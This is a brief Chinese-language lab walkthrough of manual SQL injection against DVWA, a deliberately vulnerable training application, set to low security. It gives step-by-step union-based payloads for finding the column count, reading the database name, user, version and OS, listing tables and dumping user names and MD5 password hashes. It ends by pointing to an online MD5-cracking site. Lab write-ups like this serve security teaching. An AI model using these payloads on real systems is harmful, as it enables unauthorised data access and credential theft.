1.登录DVWA,设置安全等级为LOW
2.输入1’order by 2#,有数据内容出现,输入1’order by 3#,没有数据内容显示,说明数据列只有2列
3.输入1’union select database(),user()#,查询数据库的名字,用户名
4.输入1’union select version(),@@version_compile_os#’,获取数据库版本和当前操作系统
5.输入1’union select table_name,table_schema from information_schema.tables where table_schema= ’dvwa’#,获取数据表的名称,注意’dvwa’前面有空格
6.输入1’union select user,password from users#,尝试获得用户名和密码
7.密码采用md5进行加密,到www.cmd5.com进行解密